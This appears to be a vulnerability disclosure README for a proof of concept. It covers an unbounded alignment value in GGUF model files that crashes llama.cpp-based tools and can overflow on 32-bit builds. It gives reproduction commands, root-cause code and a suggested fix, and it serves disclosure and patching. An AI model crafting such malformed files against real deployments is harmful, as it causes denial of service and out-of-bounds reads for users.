GGUF Alignment Overflow PoC — CVE Pending

⚠️ SECURITY VULNERABILITY PROOF OF CONCEPT ⚠️

This repository contains proof-of-concept files demonstrating an input validation vulnerability in the GGUF file format parser used by llama.cpp (C++) and gguf-py (Python).

Vulnerability Summary

The general.alignment KV pair in GGUF files accepts arbitrarily large power-of-2 values with no upper bound check, leading to:

  • C++ (64-bit): GGML_ASSERT failure → SIGABRT → Denial of Service
  • C++ (32-bit): GGML_PAD integer overflow → arbitrary file seek → OOB Read
  • Python: alignment=2147483648 accepted silently → memory corruption risk

Affected Software

  • llama.cpp (all versions using GGUF format)
  • Ollama (bundled llama.cpp)
  • LM Studio (bundled llama.cpp)
  • llamafile (bundled llama.cpp)
  • koboldcpp (bundled llama.cpp)
  • text-generation-webui (uses llama.cpp backend)
  • gguf-py (Python reference implementation)

Files

File                              | Description
poc_gguf_alignment_overflow.gguf  | Main PoC: alignment=0x80000000, causes SIGABRT crash
poc_alignment_max.gguf            | Minimal PoC: alignment=0x80000000, no tensors
poc_gguf_python_ndims_oom.gguf    | Python-only PoC: n_dims=0xFFFFFFFF, OOM crash

Reproduction

C++ (Crash — DoS)

git clone https://github.com/ggerganov/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build
./build/bin/llama-gguf poc_gguf_alignment_overflow.gguf r
# Result: SIGABRT (exit 134)

Python (Silent acceptance)

from gguf.gguf_reader import GGUFReader
reader = GGUFReader('poc_gguf_alignment_overflow.gguf')
print(f'alignment={reader.alignment}')  # 2147483648 — NO ERROR!

Root Cause

// ggml/src/gguf.cpp line 612-614
// Only checks: alignment != 0 AND isPowerOf2(alignment)
// MISSING: alignment <= MAX_ALIGNMENT (upper bound)
if (ctx->alignment == 0 || (ctx->alignment & (ctx->alignment - 1)) != 0) {
    GGML_LOG_ERROR("%s: alignment %zu is not a power of 2\n", ...);
    gguf_free(ctx);
    return nullptr;
}

Suggested Fix

// Add upper bound check
if (ctx->alignment == 0 || (ctx->alignment & (ctx->alignment - 1)) != 0 || ctx->alignment > 1048576) {
    GGML_LOG_ERROR("%s: alignment %zu is not a valid power of 2 (max 1048576)\n", ...);
    gguf_free(ctx);
    return nullptr;
}
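As an added illustration (not code from the repository or from llama.cpp), the snippet below places the original power-of-two check beside the bounded one from the suggested fix, and evaluates the GGML_PAD expression in 32-bit arithmetic to show why an oversized alignment turns an offset computation into a wrap-around. The upper bound 1048576 is the value from the suggested fix; the tensor data offset 0x80000010 is a constructed sample, not taken from the PoC files.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Upper bound taken from the README's suggested fix (assumption: a sane ceiling,
 * far above GGUF's default alignment of 32). */
#define GGUF_MAX_ALIGNMENT 1048576ull

/* Mirrors the check quoted under "Root Cause": non-zero and a power of two,
 * with no upper bound, so 0x80000000 passes. */
bool alignment_ok_original(uint64_t a) {
    return a != 0 && (a & (a - 1)) == 0;
}

/* Hardened check: same test plus the upper bound from the suggested fix. */
bool alignment_ok_hardened(uint64_t a) {
    return alignment_ok_original(a) && a <= GGUF_MAX_ALIGNMENT;
}

/* GGML_PAD(x, n) = ((x + n - 1) & ~(n - 1)) evaluated with a 32-bit size_t,
 * emulating a 32-bit build: x + n - 1 wraps modulo 2^32. */
uint32_t pad32(uint32_t x, uint32_t n) {
    return (x + n - 1) & ~(n - 1);
}

/* The same expression with a 64-bit size_t for comparison (no wrap here). */
uint64_t pad64(uint64_t x, uint64_t n) {
    return (x + n - 1) & ~(n - 1);
}

int main(void) {
    const uint64_t alignment = 0x80000000ull;   /* value carried by the PoC files */
    const uint32_t offset    = 0x80000010u;     /* constructed tensor data offset */

    printf("original check accepts 0x%llx: %d\n",
           (unsigned long long)alignment, alignment_ok_original(alignment));
    printf("hardened check accepts 0x%llx: %d\n",
           (unsigned long long)alignment, alignment_ok_hardened(alignment));
    /* 32-bit: 0x80000010 + 0x7FFFFFFF wraps to 0x0F, masked to 0 -> seek to file start. */
    printf("pad32(0x%x, 0x%llx) = 0x%x\n", offset,
           (unsigned long long)alignment, pad32(offset, (uint32_t)alignment));
    /* 64-bit: rounds up correctly to 0x100000000, past the end of any 32-bit file. */
    printf("pad64(0x%x, 0x%llx) = 0x%llx\n", offset, (unsigned long long)alignment,
           (unsigned long long)pad64(offset, alignment));
    return 0;
}
```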

Credit

Discovered by a security researcher. Submitted via the Huntr bounty program.
